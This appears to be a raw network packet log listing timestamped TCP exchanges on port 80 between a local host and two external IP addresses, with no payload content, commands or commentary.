Apr 27, 2024 01:31:20.975646973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.975794077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975831985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.975871086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.975966930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.976006985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.976032972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.976066113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.976460934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.976510048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.976525068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.976550102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977137089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977174997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977200985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977232933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977289915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977349997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977365971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977397919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977421999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977468014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977483988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977514982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977540016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.977577925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.977622032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.977673054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.977710962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977756023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.977771997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977797031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.977818012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.977857113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.977881908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.977917910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.977955103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.977956057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.977993965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.978032112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.978037119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.978080988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.978096008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.978127003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.978153944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.978190899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:20.978235960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.978250980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:20.978279114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:20.978285074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.978323936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:20.978367090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.018955946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.018991947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.019049883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.073323965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.120349884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.120428085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.146646976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.146744967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.147775888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.147882938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.148143053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.148185968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.148210049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.148236036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.149143934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.149183035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.149205923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.149233103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.149966955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150036097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150058031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.150094986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150130987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.150152922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.150187969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150243044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.150278091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150326014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150341988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.150374889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.150432110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150480986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.150509119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.150561094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.169464111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169688940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169728994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169748068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.169768095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169805050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169811010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.169842958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169882059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169888020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.169924021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169961929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.169964075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170001030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170038939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170043945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170078039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170114040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170121908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170151949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170190096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170200109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170243025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170279980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170285940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170320034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170356989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170361996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170396090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170433044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170434952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170471907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170509100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170511961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170562983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170603037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170609951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170648098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170684099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170686960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170723915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170762062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170768023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170799971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170838118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170841932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170876980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170917034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170922041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.170955896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.170996904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.173249006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173288107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173326969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173338890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.173367023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173408985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.173439980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173477888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173516035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173518896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.173556089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173593998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173602104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.173667908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173707008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173711061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.173747063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.173789978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.214482069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.214549065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.214601040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.315520048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.315581083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.315623999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.315625906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.317315102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.317353964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.317385912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.317416906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.317455053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.317503929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.317518950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.317549944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.318283081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.318336964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.318809032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.318859100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.318937063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.318995953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.319787025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.319845915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.319885969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.319941044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.320678949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.320719957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.320796967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.320828915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.321094036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.321142912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.321171045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.321223021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.321249962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.321296930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.321312904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.321346045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.321371078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.321417093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.321433067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.321463108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.363411903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.366733074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.366774082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.366811991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.366817951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.366885900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.366931915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.366983891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367057085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367094994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367142916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367217064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367254972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367260933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367294073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367333889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367341042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367371082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367408037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367413998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367446899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367485046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367494106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367522955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367561102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367566109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367623091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367660999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367676973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367714882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367752075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367754936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367789984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367826939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367827892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367866039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367902040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.367908001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367945910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.367990971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.368000984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368037939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368077040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368077993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.368139982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368179083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368184090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.368216991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368254900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368259907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.368294001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368335962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.368886948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368926048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.368963003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.368963957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369003057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369040966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369044065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.369081020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369117975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369118929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.369158030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369191885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.369194984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369232893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369270086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369277954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.369308949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.369352102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.410675049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.410716057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.410764933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.488936901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.488981962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.489008904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.489042044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.489690065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.489748955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.489784002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.489895105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.490397930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.490437031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.490463018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.490494967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.491271019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.491311073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.491348982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.491349936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.492312908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.492372036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.492976904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.493017912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.493041039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.493066072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.493113995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.493161917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.493191957 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.493210077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.493242979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.493279934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.493304014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.493335962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.493360043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:21.493415117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:21.511226892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.511266947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.511343002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.511390924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.559405088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.559501886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.562879086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.562918901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.562956095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.562979937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.562994003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.563030958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.563046932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.563069105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.563122034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.564007044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564044952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564094067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.564419031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564457893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564508915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.564517975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564558029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564610004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.564634085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564721107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564759970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564790964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.564796925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564836025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:21.564840078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:21.564877987 CEST	80	49734	176.97.76.106	192.168.2.4
